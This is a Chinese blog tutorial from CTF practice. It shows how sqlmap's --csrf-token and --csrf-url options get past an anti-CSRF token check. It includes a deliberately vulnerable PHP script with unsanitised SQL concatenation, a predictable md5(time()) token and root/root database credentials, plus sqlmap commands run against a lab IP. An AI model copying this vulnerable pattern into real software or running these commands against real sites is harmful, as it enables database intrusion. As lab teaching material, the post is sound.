美文网首页
sqlmap绕过CSRF检测进行注入

sqlmap绕过CSRF检测进行注入

作者: CanMeng | 来源:发表于2020-12-01 00:59 被阅读0次

    最近在准备比赛,打sqlilabs时看了一下sqlmap的wiki,发现了–csrf-token和–csrf-url的参数,于是写了个php版本的bug试了一试。

    同时也了解了一下大家对csrf注入的普遍做法:sqlmap+burp正则匹配,两相比较,还是sqlmap自带的功能比较方便。

    写一个bug

    CSRF的普遍防御方法是增加anti-csrf token,也就是一串不可预测的字符串。于是动手写了一个php版本防csrf的sqli脚本,这里写的并不规范,时间戳是可以被预测的,而且此脚本可以被绕过token检测,有兴趣可以琢磨一下。

    <?php

        session_start();

        //生成随机token

        $token = md5(time());

        //获取name参数

        $name = isset($_GET['name']) ? $_GET['name']: '';

        //校验token

        if ($_GET['token'] == $_SESSION['token']) {

            //执行sql语句

            $mysqli = new mysqli("127.0.0.1","root","root");

            $mysqli->select_db("test");

            if (!$mysqli->connect_error) {

                $query = "select * from admin where username = '$name'";

                $result = $mysqli->query($query);

                if (!$mysqli->error) {

                    while ($row = $result->fetch_row()) {

                        echo $row;

                    }

                } else {

                    echo $mysqli->error;

                }

            } else {

                echo $mysqli->connect_error;

            }

            $mysqli->close();

        } else {

            echo "no token";

        }

        //以hidden表单元素的形式输出token

        echo "<input type=\"hidden\" name=\"token\" value=\"$token\">";

        //刷新SESSION中token

        $_SESSION['token'] = $token;

    ?>

    漏洞利用

    sqlmap 中有这样两个参数

    –csrf-token=”token_name”,指定随机化token的参数名

    –csrf-url=”http://x.x.x.x/page”,指定获取token值的地址

    如果没有指定–csrf-url,则默认从当前页面获取token。先来看看不指定token时,sqlmap的输出:

    sqlmap -u "http://192.168.154.134/tokensql.php?name=admin&token=123" --flush-session

    sqlmap根据关键字,识别出了token参数,但是默认不获取token,没有发现注入点。

    再来看看指定token时的输出:

    sqlmap -u "http://192.168.154.134/tokensql.php?name=admin&token=123" --flush-session --csrf-token="token"

    确认了注入的存在,并且在wireshark中观察到token被sqlmap自动更新

    在这个demo中,获取token的页面和注入点相同,在真实场景中,可能需要单独获取token值,这时要用到–csrf-url=<url>的参数。

    所以使用以下命令,效果也是一样的:

    sqlmap -u "http://192.168.154.134/tokensql.php?name=admin&token=123" --flush-session --csrf-token="token" --csrf-url="http://192.168.154.134/tokensql.php"

    相关文章

      网友评论

          本文标题:sqlmap绕过CSRF检测进行注入

          本文链接:https://www.haomeiwen.com/subject/vqlkwktx.html